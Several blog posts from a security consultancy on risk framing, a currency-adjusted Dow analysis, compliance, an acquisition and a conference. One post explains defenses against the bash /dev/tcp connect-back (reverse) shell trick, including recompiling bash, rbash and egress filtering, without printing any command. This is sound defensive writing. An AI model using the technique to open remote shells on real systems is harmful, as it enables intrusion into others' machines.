Speaking at HickTech

I’m always interested in finding new ways that people are looking at risk and information security. To that end, I’m making the trip today up to Owne Sound, ON to participate in HickTech. I was supposed to be a part of it last year, but missed out due to a scheduling conflict.

This year, I’m excited to talk to a whole bunch of people about the way that business and government in rural areas are dealing with information security and risk management. While I’m going there to speak, I hope to learn a great deal, as well.

And, with a schedule like this one, how could I not? Topics like “Agri-Food Traceability” and the challenges of deploying broadband to rural environments are definitely new to me.

Risk and Understanding All the Variables

One of the things that drives me the most insane is when data is presented as information without properly considering all of the variables. Over dinner with Martin a few weeks ago, I got off on a rant about an example of this. My target that night was the Dow Jones Industrial Average, which we hear about every time we turn on the financial news.

The Dow is a single point of data within the large sea of the economy. And, unfortunately, it presents a relatively skewed picture of the actual state of economic progress. I have been most enervated by it over the past couple years with the 2006-2007 psuedo-bull market that had every financial analyst talking about economic prosperity. (For example, see articles here, here, here, etc.).

Unfortunately, it’s pretty easy (about 2 hours of research and excel mojo) to show the illusory nature of the “bull market” that we have seen in the past 4 years. The US government has pursued an aggressive strategy of currency devaluation since 2002, and that plays heavily into the value of any asset valued in USD (e.g. the Dow). In order to understand the true nature of the state of the Dow, one must take into account all of the variables – in this case, the value of the currency that the price of the market is described in.

Dow raw and adjusted for the euro

Martin would point out that this is a somewhat naive analysis as I have only adjusted for one currency. To do a more robust analysis, we would have to average the currency impact across world regions, including the Chinese Yuan, Canadian Dollar and British Pound. However, even with a simple analysis, the results show a staggering change. While the DJIA enjoyed a raw increase of approximately 75% between 2003-2008, when adjusted for changes in currency value against the Euro, we see that increase drop to 35%.

This is significant – assuming that you got in at the absolute low (Feb 2003) and out at the top of each, this suggests that your actual annual rate of return on the investment went from 11.7% when just looking at the DJIA to 6.3% when adjusting for currency.

And I didn’t even factor in goods/services inflation or taxes. If I had, you would see that the currency loss here is the difference between making a profit and just barely breaking even on the investment.

Why am I talking about all this random financial stuff on a blog dedicated to risk and security (especially when I’m not an accountant)? Because this IS risk. This is the same kind of calculation that we make every day, and it is the same sort of mistake that I see risk management professionals make all the time. When calculating risk, we have a tendency to look only at the simple numbers – humans just aren’t good at multivariate analysis, especially in our head. So, we have a tendency to look for simple answers, often resorting the Tarzan method:

Dow up, good. Dow down, bad.

Unfortunately, it’s never quite that simple. If you don’t take into account all of the variables when considering the risk of your investments (whether financial, information security, or otherwise), you’re likely to significantly mis-read the potential for return on those investments.

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at Information Week about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here

Whose Risk?

I often get frustrated when we talk about risk, measurement, metrics, and (my new least favorite buzz word) “key performance indicators”. Because we (as an industry) have a tendency to drop the audience from the statement of risk.

That may sound confusing, but I’ll illustrate by example. This is a real sentence that I hear far too often:

Doing that presents too much risk.

Unfortunately, that sentence is linguistically incomplete. The concept of “risk” requires specification of the audience – Risk to whom/what? This is a similar problem as that which Lakoff presents in Whose Freedom? – certain concepts require a reference to the audience in order to make sense of them. Leaving the audience unspecified is productive when used in marketing (or politics), but creates massive confusion when actually trying to have real productive discourse.

A recent post at Security Retentive illustrates the kind of confusion that ensues when the audience for risk metrics/measurements isn’t specified. (I have also previously talked (ranted?) about this type of confusion here and here.

This confusion fundamentally arises from the need to remember that risk is relative to an audience. The confusion arises because of a lack of perspective – each person in the discourse applies the “risk” to their own perspective, and comes up with radically differing meanings.

It seems important that when we’re talking about and attempting to measure and specify risk, we need to always present the data/information to a relevant audience: risk to what/whom is an important way of ensuring that we don’t remain mired in the kind of confusion that Security Retentive talked about.

Connect-back Shell – Defending the Box

Far be it from us to talk about offense without a corresponding defensive post. Cris’ post yesterday got some attention from a few other blogs (here, here, and here for starters), but it wasn’t the entire story. While we discover a lot of these methods in our penetration tests and application assessments, Neohapsis is, first and foremost, about protecting our customers. So, when you see us post something about cool new offensive methods (as I’m sure you will quite often), you can always expect someone to chime in with defense.

Today, that person is me.

Preventing the Connect-Back Shell

I’ll start with the obvious one: keep your device from being compromised. The connect-back bash trick will only work once the host is compromised as a method of allowing easy access. Thus, if the device isn’t compromised, this never happens.

Alright, that was too simple. Let’s talk about prevention once compromise happens.

What Cris wrote about isn’t new. This method of using bash to provide easy access to sockets has been known for quite some time – it’s easily discovered on the blogosphere in articles here and here for example. Since this is built-in to bash by default in most instances, the main method of prevention is the one that Cris hinted at in his article – if you’re on a system that you believe could be compromised or simply want to harden, you have to recompile bash to remove the /dev/tcp and /dev/udp redirects.

Come to think of it, though… if the box is worth hardening to that level, why have bash on the box at all? Or, at the very least, why not set all user’s shells to rbash and restrict them from accessing the redirection operators that make this possible?

Mitigation of the Issue

Since this trick lives in bash, it’s entirely within user-space. So, there are things we can do within the kernel to mitigate the attack. The first one that comes to mind is ensuring that the target host has a decent packet-filter on it – this probably should be part of most system hardening in the first place. If we’re talking about a system with a well-known service profile (e.g. a web-server), allowing all client-initiated outbound connections to the web probably isn’t the best of ideas. So, set up a packet filter on the box to allow only the connections that you know are required.

Okay… that’s just a couple of ideas. If you have other ideas, please post them in the comments section. We’d love to hear any discussion or thoughts on how to mitigate against this.

Joining together

Another great development of RSA was the opportunity to meet the team from Securac (also known as Certus). For those that don’t know, Neohapsis acquired Securac a couple of weeks ago.

Being at RSA gave us the opportunity to have a fantastic dinner where members of both teams talked, laughed, and had a few drinks together. It’s clear that there’s a fit here – an outsider couldn’t have known who came from which company.

The New Neo Team

While I have often been an outspoken critic of mergers and acquisitions as a means of improving business, there are sometimes that it actually works. This seems like it’s one of those times – from spending a few hours with the members of the Securac team, there’s a cultural fit as well as an incredible meshing of vision and goals.

It’s going to be fun working with this team. Welcome to all of my new teammates.

Willful Blindness

RSA is always a time of endless meetings and endless discoveries of new products. Walking around the floor this year is incredibly frustrating and enlightening (which I’ll expound on in another post). But with a role entirely dedicated to evaluating products, I keep having conversations that start something like this:

My new {software/hardware/application/appliance/token} is so cool and revolutionary. It does something you’ve never seen any other product do!

That person then goes on to describe a feature that is in every product that already exists in the space, most of which are doing whatever the person has described ten times better and more effectively.

Unfortunately, I don’t have the heart to break it to them that their product is, well… lacking. But it always makes me wonder: did this person Google whether the feature existed when they had the blinding flash of inspiration that lead them to develop this (not at all) novel breakthrough?

What interests me most is the idea that they did – if they didn’t bother to do their research, it’s just ignorance. But if they did, and still believe it’s novel, that suggests a willful (though potentially unconscious) blindness to the lack of novelty in their ideas. It’s as though (to use an over-used and somewhat disturbing colloquialism) they have drank the Kool-Aid of their own invention to the point that they’re absolutely unable to see that their product is particularly interesting.